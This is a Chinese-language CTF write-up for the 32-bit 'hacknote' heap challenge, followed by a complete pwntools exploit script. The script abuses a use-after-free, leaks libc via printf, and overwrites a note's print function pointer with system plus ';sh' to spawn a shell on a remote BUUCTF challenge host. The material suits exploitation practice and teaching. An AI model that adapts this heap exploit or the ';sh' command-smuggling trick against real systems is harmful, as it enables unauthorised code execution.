32位程序,开启了 canary 和 NX 保护,一道简单的菜单堆。
说实话,我总感觉这题做过,结果去wiki上看确实做过,但wiki上那个题有后门函数,所以比这题简单不少(虽然都差不多)
漏洞主要就是释放堆块后未将指针置空导致UAF,程序很简单就不分析了。
唯一值得注意的就是:最后执行的其实是system(system_addr;sh\x00),其中分号“;”起到分割命令的作用。
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
#context(arch = 'amd64', os = 'linux')
context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'
#io = process("./hacknote")
io = remote("node4.buuoj.cn", 28586)
elf = ELF("./hacknote")
#libc = elf.libc
libc = ELF("/home/xiaozaya/rubbish/pwnh/buuctf/libc/u16-x32.so")
def debug():
gdb.attach(io)
pause()
sd = lambda s : io.send(s)
sda = lambda s, n : io.sendafter(s, n)
sl = lambda s : io.sendline(s)
sla = lambda s, n : io.sendlineafter(s, n)
rc = lambda n : io.recv(n)
rl = lambda : io.recvline()
rut = lambda s : io.recvuntil(s, drop=True)
ruf = lambda s : io.recvuntil(s, drop=False)
addr4 = lambda n : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8 = lambda n : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte = lambda n : str(n).encode()
info = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh = lambda : io.interactive()
menu = b'Your choice :'
def add(size, content):
sla(menu, b'1')
sla(b'size :', byte(size))
sda(b'Content :', content)
def dele(idx):
sla(menu, b'2')
sla(b'Index :', byte(idx))
def show(idx):
sla(menu, b'3')
sla(b'Index :', byte(idx))
add(8, b'A\n')
add(16, b'A\n')
dele(0)
dele(1)
add(8, p32(0x0804862B)+p32(0x0804A010))
show(0)
libc.address = addr4(4) - libc.sym.printf
info("libc_base", libc.address)
dele(2)
add(8, p32(libc.sym.system)+b';sh\x00')
#debug()
show(0)
sh()